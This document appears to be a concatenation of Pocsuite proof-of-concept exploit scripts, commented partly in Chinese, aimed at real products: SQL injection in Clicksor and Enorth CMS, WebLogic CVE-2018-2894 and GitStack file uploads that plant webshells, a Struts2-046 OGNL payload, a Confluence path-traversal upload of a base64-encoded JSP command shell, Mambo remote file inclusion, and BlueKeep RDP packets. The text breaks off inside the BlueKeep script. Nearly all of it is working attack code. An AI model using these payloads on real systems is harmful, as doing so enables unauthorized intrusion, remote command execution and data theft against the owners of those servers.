from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = 'SSV-68525'  # vul ID
    version = '1'
    author = 'fenghh'
    vulDate = '2010-05-04'
    createDate = '2015-10-15'
    updateDate = '2015-10-15'
    references = ['http://sebug.net/vuldb/ssvid-19358']
    name = 'Clicksor SQL Injection Vulnerability'
    appPowerLink = 'www.clicksor.com'
    appName = 'Clicksor'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''  
        google dock:" Powered by Clicksor.com Contextual Advertising".
        index.php?id参数导致过滤
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        output = Output(self)
        result = {}
        payload = "/index.php?page=view&id=-511 UNION SELECT 1,md5(666),3,4,5,6,7,8--"
        verify_url = self.url + payload
        content = req.get(verify_url).content
        if 'fae0b27c451c728867a567e8c1bb4e53' in content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = verify_url
            output.success(result)
        else:
            output.fail('SQL Injection Failed')
        return output

    def _attack(self): 
        return self._verify()

register(TestPOC)


#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req
import urllib
# register
from pocsuite.api.poc import register
# report
from pocsuite.api.poc import Output, POCBase
# url转换host
from pocsuite.lib.utils.funs import url2ip
import re
import sys
import time
import argparse
import requests
import xml.etree.ElementTree as ET






def get_current_work_path(host):
    geturl = host + "/ws_utc/resources/setting/options/general"
    ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'}
    request = requests.get(geturl)
    values = []
    if request.status_code == 404:
        exit("{} 404 not found".format(geturl))
    elif "Deploying Application".lower() in request.text.lower():
        print("First Deploying waiting a moment")
        time.sleep(30)
        request = requests.get(geturl, headers=ua)
    if "</defaultValue>" in request.content:
        root = ET.fromstring(request.content)
        value = root.find("section").find("options")
        for e in value:
            for sub in e:
                if e.tag == "parameter" and sub.tag == "defaultValue":
                    values.append(sub.text)
    if values:
        return values[0]
    else:
        exit(request.content)
def get_new_work_path(host):
    current_work_path = get_current_work_path(host)
    works = "/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war"
    if "\\" in current_work_path:
        works = works.replace("/", "\\")
    new_path = str(current_work_path[: str(current_work_path).find("_domain") + 7] + works)
    return new_path

def set_new_upload_path(host, path):
    data = {
        "setting_id": "general",
        "BasicConfigOptions.workDir": path,
        "BasicConfigOptions.proxyHost": "",
        "BasicConfigOptions.proxyPort": "80"}
    headers = {
                    'Content-Type': 'application/x-www-form-urlencoded',
                    'X-Requested-With': 'XMLHttpRequest', }
    request = requests.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers)
    if "successfully" in request.content:
        return True
    else:
        return False

def upload_webshell(host, uri):
    if not set_new_upload_path(host, get_new_work_path(host)):
        return ""
    password="123"
    upload_content = "test test"
    files = {
        "ks_edit_mode": "false",
        "ks_password_front": password,
        "ks_password_changed": "true",
        "ks_filename": ("testshell.jsp", upload_content)
        }

    request = requests.post(host + uri, files=files)
    response = request.text
    match = re.findall("<id>(.*?)</id>", response)
    if match:
        tid = match[-1]
        shell_path = host + "/bea_wls_internal/config/keystore/" + str(tid) + "_testshell.jsp"
        headers = {
                    'Content-Type': 'application/x-www-form-urlencoded',
                    'X-Requested-With': 'XMLHttpRequest', }
        if upload_content in requests.get(shell_path, headers=headers).content:
            return str(shell_path)
        else:
            return ""
    else:
        return ""


# 基础基类
class webLogicPOC(POCBase):
    vulID = '41'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  # 默认为1
    vulDate = '2018-07-20'  # 漏洞公开的时间,不知道就写今天
    author = 'xiaohuihui1'  # PoC作者的大名
    createDate = '2018-07-20'  # 编写 PoC 的日期
    updateDate = '2018-07-20'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://xz.aliyun.com/t/2458']  # 漏洞地址来源,0day不用写
    name = 'webLogic file upload'  # PoC 名称
    appPowerLink = 'http://www.oracle.com'  # 漏洞厂商主页地址
    appName = 'webLogic'  # 漏洞应用名称
    appVersion = 'all versions'  # 漏洞影响版本
    vulType = 'file upload'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        webLogic-CVE-2018-2894 getshell
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"  # 严重,高危,中危,低危

    # 指纹方法
    def _fingerprint(self):
        pass

    def _verify(self):
        # 调用指纹方法
        result={}

        #如果设置端口则取端口,没有设置则为默认端口
        import re
        vul_url = "%s"%self.url
        # from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = url2ip(vul_url)[1]
        else :
            _host = url2ip(vul_url)
            _port = "7001"
        vul_ip = "http://%s:%s/ws_utc/config.do" % (_host, _port)
        try:
            response = req.get(url=vul_ip,timeout=5,allow_redirects=False) #禁止重定向
            if(response.status_code==200 and "WSDL" in response.text):
                
                url = "/ws_utc/resources/setting/keystore"
                target = "http://%s:%s/" % (_host, _port)
                response=upload_webshell(target, url)
                if(response!=""):

                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_ip
                    result['VerifyInfo']['Payload'] = response
                    return self.save_output(result)
        except Exception as e:
            print(str(e))
            pass
        return self.save_output(result)
    # 攻击模块
    def _attack(self):
        return self._verify()
        #pass

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

# 注册类
register(webLogicPOC)





#!/usr/bin/env python
# coding: utf-8

from urlparse import urljoin
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '89306'  # vul ID
    version = '1'
    author = ['cnyql']
    vulDate = '2015-09-02'
    createDate = '2015-09-02'
    updateDate = '2015-09-12'
    references = ['http://www.sebug.net/vuldb/ssvid-89306']
    name = 'Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp'
    appPowerLink = 'http://webpublisher.enorth.com.cn/'
    appName = 'Enorth Webpublisher CMS'
    appVersion = 'unknown'
    vulType = 'SQL Injection'
    desc = '''
    Enorth Webpublisher CMS so far of the scale of tens of thousands of web sites, with the government, enterprises, scientific research and education and media industries fields such as nearly thousands of business users.
    '''

    def _verify(self):
        payload = "pub/m_pending_news/delete_pending_news.jsp?cbNewsId=1)%20and%201=ctxsys.drithsx.sn(1,(Utl_Raw.Cast_To_Raw(sys.dbms_obfuscation_toolkit.md5(input_string => '3.14'))))?"
        # ORACLE ERROR BASED INJ

        res = req.get(urljoin(self.url, payload), timeout=5)
        return self.parse_verify(res, payload)
    
    def parse_verify(self, res, payload):
        output = Output(self)
        result = {}

        if '4beed3b9c4a886067de0e3a094246f78' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = urljoin(self.url, payload)
            output.success(result)

        else:
            output.fail('Internet Nothing returned')

        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-
# from pocsuite.api.request import req
from pocsuite.api.poc import register, Output, POCBase
from requests.auth import HTTPBasicAuth
import requests
import urlparse
import random
import os
import sys
import hashlib
import string


class TestPOC(POCBase):
    vulID = 'N/A'
    version = 'GitStack <= 2.3.10'
    author = 'co0ontty'
    vulDate = '2019-7-11'
    createDate = '2019-7-16'
    updateDate = '2018-3-31'
    references = ['https://xz.aliyun.com/t/2235']
    name = 'GitStack <= 2.3.10 远程命令执行漏洞分析'
    appPowerLink = 'https://gitstack.com'
    appName = 'GitStack'
    appVersion = 'GitStack <= 2.3.10'
    vulType = '文件上传'
    desc = '''
    该漏洞利用GitStack正常使用过程中调用的接口的未授权访问漏洞，越权读取、创建、修改用户列表、仓库。通过进一步利用实现恶意文件的上传。
    '''
    samples = []
    install_requires = []

    def _verify(self):
        result = {}
        target = self.url
        hostname = urlparse.urlparse(target).hostname
        port = urlparse.urlparse(target).port
        if port is None:
            target = target+":80"
        repository = ''.join(random.sample(string.digits+string.ascii_letters, 4))
        username = ''.join(random.sample(string.digits+string.ascii_letters, 4))
        password = ''.join(random.sample(string.digits+string.ascii_letters, 4))
        csrf_token = ''.join(random.sample(string.digits+string.ascii_letters, 4))
        user_list = []
        r_getuser = requests.get("{}/rest/user/".format(target))
        try:
            user_list = r_getuser.json()
            user_list.remove('everyone')
        except:
            pass
        if len(user_list) > 0:
            username = user_list[0]
        else:
            r_create_user = requests.post("{}/rest/user/".format(target),
                                          data={'username': username, 'password': password})
        r_getrepo = requests.get("{}/rest/repository/".format(target))
        repository_list = r_getrepo.json()
        if len(repository_list) > 0:
            repository = repository_list[0]['name']
        r_post_csrftoken = requests.post("{}/rest/repository/".format(target), cookies={
                                         'csrftoken': csrf_token}, data={'name': repository, 'csrfmiddlewaretoken': csrf_token})
        r_create_user = requests.post(
            "{}/rest/repository/{}/user/{}/".format(target, repository, username))
        r_del_user = requests.delete(
            "{}/rest/repository/{}/user/{}/".format(target, repository, "everyone"))
        random_file_name = ''.join(random.sample(string.ascii_letters+string.digits, 16))+".php"
        random_identify_code = ''.join(random.sample(string.ascii_letters+string.digits, 35))
        # webshell = 'p && echo "<?php echo"'+random_identify_code+'"; ?>" > c:'
        webshell = 'p && echo " <?php @eval($_POST[value]);echo"'+random_identify_code+'";?>" > c:'

        del_webshell = 'p && echo " <?php unlink("{}");unlink("{}")?>" > c:'.format(
            random_file_name, "del.php")

        r_create_file = requests.get('{}/web/index.php?p={}.git&a=summary'.format(
            target, repository), auth=HTTPBasicAuth(username, "{}".format(webshell)+random_file_name))
        test_url = target+"/web/"+random_file_name
        r_verify = requests.get(test_url)
        if (r_verify.status_code == 200):
            if (random_identify_code in r_verify.text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                # result['VerifyInfo']['Result'] = test_url
                # 触发文件删除
                r = requests.get('{}/web/index.php?p={}.git&a=summary'.format(target, repository),
                                 auth=HTTPBasicAuth(username, "{}".format(del_webshell)+"del.php"))
                r = requests.get(target+"/web/del.php")
                ##
            pass
        return self.parse_output(result)

    _attack = _verify

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!usr/bin/env python  
# -*- coding:utf-8 -*-

"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
from urllib.parse import urljoin

from pocsuite3.api import Output, POCBase, register_poc, logger, requests
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '3.0'
    author = ['']
    vulDate = '2020-9-3'
    createDate = '2020-9-3'
    updateDate = '2020-9-3'
    references = ['']
    name = 'PhpStudy Nginx Parse Vul'
    appPowerLink = ''
    appName = 'PhpStudy'
    appVersion = ''
    vulType = 'Parse Vul'
    desc = '''
    '''
    samples = []
    install_requires = ['']

    def exploit(self, mode):
        result = {}

        rand_path = random_str()
        vul_url1 = urljoin(self.url, "/" + rand_path)
        vul_url2 = urljoin(self.url, "/" + rand_path + "/.php")

        resp1 = requests.get(vul_url1)
        resp2 = requests.get(vul_url2)
        if resp1.status_code == 404 and "No input file specified" in resp2.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return result

    def _verify(self):
        result = {}

        try:
            result = self.exploit(mode='verify')
        except Exception as e:
            logger.error(str(e))
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



#!/usr/bin/env python
#coding=utf-8

import traceback

# 将输入的url转换为ip:port，供socket使用
from pocsuite3.lib.utils import url2ip
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class Elasticsearch_POC(POCBase):
    vulID = 'Elasticsearch-unauthorized-access'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    appName = 'Elasticsearch'
    appVersion = ''
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.INFORMATION_DISCLOSURE

    vulDate = '2020-04-17'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-04-17'  # 编写 PoC 的日期
    updateDate = '2020-04-17'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://github.com/chaitin/xray/blob/master/pocs/elasticsearch-unauth.yml', 'https://www.cnblogs.com/xiaozi/p/8275201.html']  # 漏洞地址来源,0day不用写
    name = 'Elasticsearch未授权访问漏洞'  # PoC 名称
    cvss = u"高危"


    '''
    poc检测两个特征，加强可靠性：
    1，GET访问根路径，返回es的slogan：`You Know, for Search`；
    2，GET访问`/_cat`，响应里有`/_cat/master`
    '''
    def _verify(self):
        result={}

        vul_url = self.url
        target_url = vul_url

        # 传入True参数，得到host和port，参考：https://github.com/knownsec/pocsuite3/blob/0f68c1cef3804c5d43be6cfd11c2298f3d77f0ad/pocsuite3/lib/utils/__init__.py
        #host, port = url2ip(target_url, True)  

        # 根路径访问
        ROOT_PATH = '/'
        ROOT_URL =  vul_url + ROOT_PATH

        # /_cat路径访问
        QUERY_PATH = '/_cat'
        QUERY_URL  = vul_url + QUERY_PATH


        try:
            resp = req.get(ROOT_URL)

            # 1, 响应体里是否含有`You Know, for Search`，Content-Type是否为'application/json'
            if resp.status_code == 200 and 'application/json' in resp.headers['Content-Type'].lower():

                resp = req.get(QUERY_URL)

                # 2, 响应码为200 且响应中包含`/_cat/master`
                if resp.status_code == 200 and '/_cat/master' in resp.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target_url
                    return self.save_output(result)

                return self.save_output(result)
        except Exception as e:
            print(e)
            traceback.print_stack()
        
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        return self._verify()



    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register_poc(Elasticsearch_POC)


#!/usr/bin/python
# -*- coding: utf-8 -*-


from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import urlparse
import random
import hackhttp

class Struts46POC(POCBase):
    name = 'struts046'
    vulID = '0'  
    author = ['bey0nd']
    vulType = 'Command Execution'
    version = '1.0'    # default version: 1.0
    references = ['']
    desc = '''struts2-046'''

    vulDate = '2013-02-14'
    createDate = '2013-02-14'
    updateDate = '2013-02-14'

    appName = 'struts'
    appVersion = 'struts'
    appPowerLink = 'struts'
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        try:
            if self.check_vuln(self.url):
                result['FileInfo'] = {}
                result['FileInfo']['Filename'] = "st046"
        except Exception as e:
            pass
        
        return self.parse_output(result)

    def check_vuln(self,arg):
        curl = hackhttp.hackhttp()
        uri = urlparse.urlparse(arg).path
        randint1 = random.randint(1000, 10000)
        raw = """POST {uri} HTTP/1.1
Accept-Encoding: identity
Content-Length: 171
Cookie: access_token=a049bd87-d8c6-4756-aa6a-46a357a8de36;
Content-Type: multipart/form-data; boundary=1c88e9afa73c438d93b5043a7096b207
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

--1c88e9afa73c438d93b5043a7096b207
Content-Disposition: form-data; name="image1"; filename="%{{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test-{randint1}','bey0nd')}}'\x00b"
Content-Type: text/plain


--1c88e9afa73c438d93b5043a7096b207--
    """.format(uri=uri, randint1=str(randint1))
        code, head, html, redir, log= curl.http(arg, raw=raw)
        # print head
        if  code != 0  and "X-Test-%s" % str(randint1) in head:
            return True
        else:
            return False
    

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Failed')
        return output

register(Struts46POC)



#!/usr/bin/env python
#coding=utf-8

import random
import json
import time
import base64
from string import ascii_letters

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE




'''
CVE-2019-3398
'''
class Confluence_3398_POC(POCBase):
    vulID = 'Confluence-CVE-2019-3396'
    appName = 'Confluence'
    appVersion = '''All 2.x.x
    All 3.x.x versions
    All 4.x.x versions
    All 5.x.x versions
    All 6.0.x versions
    All 6.1.x versions
    All 6.2.x versions
    All 6.3.x versions
    All 6.4.x versions
    All 6.5.x versions
    All 6.6.x versions before 6.6.13
    All 6.7.x versions
    All 6.8.x versions
    All 6.9.x versions
    All 6.10.x versions
    All 6.11.x versions
    All 6.12.x versions before 6.12.4
    All 6.13.x versions before 6.13.4
    All 6.14.x versions before 6.14.3
    All 6.15.x versions before 6.15.2'''
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.PATH_TRAVERSAL

    vulDate = '2019-04-17'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-02-17'  # 编写 PoC 的日期
    updateDate = '2020-02-17'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html',
                    'https://github.com/superevr/cve-2019-3398/blob/master/poc.py']  # 漏洞地址来源,0day不用写
    name = 'Confluence路径穿越漏洞 CVE-2019-3398'  # PoC 名称
    install_requires = ["bs4"]  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"

    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)

    http_proxy  = "http://127.0.0.1:8087"
    proxies = {"http": http_proxy, "https": http_proxy}

    # 漏洞利用需要一个可以创建页面的用户账号
    values = {'os_username':'cqq', 'os_password':'cqq',
        'login':'Log+in', 'os_destination':''}


    def _verify(self):

        from bs4 import BeautifulSoup

        result={}

        vul_url = self.url

        headers = {
            "X-Atlassian-Token": "no-check",
        }

        jspshell = 'PCVAIHBhZ2UKaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiJT4KPCUKJT4KPEhUTUw+CjxCT0RZPgo8SDM+SlNQIFNIRUxMPC9IMz4KPEZPUk0gTUVUSE9EPSJHRVQiIE5BTUU9Im15Zm9ybSIKQUNUSU9OPSIiPgo8SU5QVVQgVFlQRT0idGV4dCIgTkFNRT0iY21kIj4KPElOUFVUIFRZUEU9InN1Ym1pdCIgVkFMVUU9IkV4ZWN1dGUiPgo8L0ZPUk0+CjxQUkU+CjwlCmlmIChyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikgIT0gbnVsbCkgewpvdXQucHJpbnRsbigiQ29tbWFuZDogIiArCnJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSArICI8QlI+Iik7ClByb2Nlc3MgcCA9ClJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKT3V0cHV0U3RyZWFtIG9zID0gcC5nZXRPdXRwdXRTdHJlYW0oKTsKSW5wdXRTdHJlYW0gaW4gPSBwLmdldElucHV0U3RyZWFtKCk7CkRhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKU3RyaW5nIGRpc3IgPSBkaXMucmVhZExpbmUoKTsKd2hpbGUgKCBkaXNyICE9IG51bGwgKSB7Cm91dC5wcmludGxuKGRpc3IpOwpkaXNyID0gZGlzLnJlYWRMaW5lKCk7Cn0KfQolPgo8L1BSRT4KPC9CT0RZPgo8L0hUTUw+Cg=='

        login = req.post(vul_url + '/dologin.action', headers=headers, data=values)

        soup = BeautifulSoup(login.text, 'html.parser')

        createpage = req.get(vul_url + '/pages/createpage.action')

        soup = BeautifulSoup(createpage.text, 'html.parser')

        draft_id = soup.select_one('meta[name="ajs-draft-id"]').get('content',None)

        attach_url = vul_url + '/plugins/drag-and-drop/upload.action?draftId=' + draft_id +\
            '&filename=../../../../../../opt/atlassian/confluence/confluence/shell.jsp&size=637&mimeType=text%2fplain'

        # 第一步，先将webshell上传上去，其内容会出现在confluence的安装目录;
        # 注意上传的时候的size参数需与Content-Length值保持一致，服务端会对这个做校验，若发现不一致，则会导致失败响应500。
        resp = req.post(attach_url, headers=headers, data=base64.b64decode(jspshell))

        # 第二步，通过路径穿越将缓存的webshell内容写入指定的路径
        trigger_url = vul_url + '/pages/downloadallattachments.action?pageId=' + draft_id
        if resp.status_code == 200:
            resp = req.get(trigger_url, headers=headers)
            if resp.status_code == 200:
                print('Success! Go to ' + url + 'shell.jsp for your shell!')

        return self.save_output(result)

    # 攻击模块
    def _attack(self):
        self._verify()


    # 验证DNS已被解析，命令执行
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            name = d['data'][0]['name']
            if self.BANNER in name:
                return True
        except Exception:
            return False


    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output




# 注册类
register_poc(Confluence_3398_POC)



#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = '63674'  # ssvid
    version = '1.0'
    author = ['皮皮']
    vulDate = '2006-07-03'
    createDate = '2015-12-24'
    updateDate = '2015-12-24'
    references = ['http://www.sebug.net/vuldb/ssvid-63674']
    name = 'Pearl For Mambo &lt;= 1.6 - Multiple Remote File Include Vulnerabilities'
    appPowerLink = ''
    appName = 'galleria Mambo Module'
    appVersion = '<= 1.0b'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']


    def _attack(self):
        return self._verify()


    def _verify(self):
        result = {}
        vul_url = '%s/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://baidu.com/robots.txt' % self.url
        response = req.get(vul_url).content

        if 'Baiduspider' in response and 'Googlebot' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output

register(TestPOC)



#!/usr/bin/env python
#_*_ encoding: utf-8 _*_
from pocsuite3.api import register_poc
from pocsuite3.api import Output
from pocsuite3.api import logger
from pocsuite3.api import POCBase
from pocsuite3.api import requests

class Weblogic(POCBase):
    vulID = 'N/A'
    version = '1.0'
    author = 'big04dream'
    vulDate = ''
    createDate = '2019-11-07'
    updateDate = '2019-11-07'
    references = ['']
    name = 'Oracle Weblogic Any File Upload Vulnerability (CVE-2018-2894)'
    appPowerLink = 'Oralce'
    appName = 'Weblogic'
    appVersion = '10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3'
    vulType = 'file upload'
    desc = ''' 
    Oracle WebLogic 两处'/ws_utc/begin.do'|'/ws_utc/config.do', 任意文件上传漏洞（CVE-2018-2894)
    '''

    @property
    def _headers(self):
        headers = {'user-agent': 'ceshi/0.0.1'}
        return headers

    def _verify(self):
        result = {}
        payload = 'ws_utc/resources/setting/options/general'
        try:
            if self.url[-1] == '/':
                url = self.url + payload
            else:
                url = self.url + '/' + payload
            response = requests.get(
                url=url,
                headers=self._headers
            )
            if response.status_code != 404:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

register_poc(Weblogic)


#!/usr/bin/env python3
# -*- coding:utf-8 -*-

import socket
import struct
import binascii
import hashlib
import random
import base64
from pocsuite3.api import Output, POCBase, register_poc


class RC4:
    """
    This class implements the RC4 streaming cipher.
    Derived from http://cypherpunks.venona.com/archive/1994/09/msg00304.html
    """

    def __init__(self, key, streaming=True):
        assert(isinstance(key, (bytes, bytearray)))

        # key scheduling
        S = list(range(0x100))
        j = 0
        for i in range(0x100):
            j = (S[i] + key[i % len(key)] + j) & 0xff
            S[i], S[j] = S[j], S[i]
        self.S = S

        # in streaming mode, we retain the keystream state between crypt()
        # invocations
        if streaming:
            self.keystream = self._keystream_generator()
        else:
            self.keystream = None

    def crypt(self, data):
        """
        Encrypts/decrypts data (It's the same thing!)
        """
        assert(isinstance(data, (bytes, bytearray)))
        keystream = self.keystream or self._keystream_generator()
        return bytes([a ^ b for a, b in zip(data, keystream)])

    def _keystream_generator(self):
        """
        Generator that returns the bytes of keystream
        """
        S = self.S.copy()
        x = y = 0
        while True:
            x = (x + 1) & 0xff
            y = (S[x] + y) & 0xff
            S[x], S[y] = S[y], S[x]
            i = (S[x] + S[y]) & 0xff
            yield S[i]


class TestPOC(POCBase):
    vulID = '97954'
    version = '1.0'
    author = ['big04dream']
    vulDate = '2019-05-15'
    createDate = '2019-10-10'
    updateDate = '2019-10-10'
    references = ['https://www.seebug.org/vuldb/ssvid-97954']
    name = 'windows bluekeep rdp rce (cve-2019-0708)'
    appPowerLink = 'https://www.microsoft.com'
    appName = 'rdp'
    appVersion = 'win7, win2k8, win2k8 r2, win2k3, winxp'
    vulType = 'rce'
    desc = '''
    Windows Bluekeep RDP Remote Code Execution
    '''

    def _log(self, message):
        pass
        #print(message)

    def _bin_to_hex(self, data):
        return ''.join('%.2x' % i for i in data)

    def _create_socket(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
        s.settimeout(10)
        s.connect((self.ip, self.port))
        return s

    def _conn_req(self):
        return (
            b"\x03\x00" # TPTK, Version: 3, Reserved: 0
            b"\x00\x2b" # Length
            b"\x26" # X.224 Length
            b"\xe0" # X.224 PDU Type
            b"\x00\x00" #  Destination reference
            b"\x00\x00" # Source reference
            b"\x00" # Class
            b"\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x6d\x73\x74\x73\x68\x61\x73\x68\x3d\x75\x73\x65\x72\x30\x0d\x0a" # Token
            b"\x01" # RDP Type
            b"\x00" # Flags
            b"\x08" # Length
            b"\x00\x00\x00\x00\x00" # requestedProtocols, TLS security supported: False, CredSSP supported: False
        )

    def _connect_initial(self):
        return (
            b"\x03\x00\x01\xca\x02\xf0\x80\x7f\x65\x82\x01\xbe\x04\x01"
            b"\x01\x04\x01\x01\x01\x01\xff\x30\x20\x02\x02\x00\x22\x02\x02\x00"
            b"\x02\x02\x02\x00\x00\x02\x02\x00\x01\x02\x02\x00\x00\x02\x02\x00"
            b"\x01\x02\x02\xff\xff\x02\x02\x00\x02\x30\x20\x02\x02\x00\x01\x02"
            b"\x02\x00\x01\x02\x02\x00\x01\x02\x02\x00\x01\x02\x02\x00\x00\x02"
            b"\x02\x00\x01\x02\x02\x04\x20\x02\x02\x00\x02\x30\x20\x02\x02\xff"
            b"\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x02\x00\x01\x02\x02\x00"
            b"\x00\x02\x02\x00\x01\x02\x02\xff\xff\x02\x02\x00\x02\x04\x82\x01"
            b"\x4b\x00\x05\x00\x14\x7c\x00\x01\x81\x42\x00\x08\x00\x10\x00\x01"
            b"\xc0\x00\x44\x75\x63\x61\x81\x34\x01\xc0\xd8\x00\x04\x00\x08\x00"
            b"\x20\x03\x58\x02\x01\xca\x03\xaa\x09\x04\x00\x00\x28\x0a\x00\x00"
            b"\x78\x00\x31\x00\x38\x00\x31\x00\x30\x00\x00\x00\x00\x00\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xca\x01\x00"
            b"\x00\x00\x00\x00\x18\x00\x07\x00\x01\x00\x00\x00\x00\x00\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            b"\x04\xc0\x0c\x00\x09\x00\x00\x00\x00\x00\x00\x00\x02\xc0\x0c\x00"
            b"\x03\x00\x00\x00\x00\x00\x00\x00\x03\xc0\x44\x00\x05\x00\x00\x00"
            b"\x63\x6c\x69\x70\x72\x64\x72\x00\xc0\xa0\x00\x00\x4d\x53\x5f\x54"
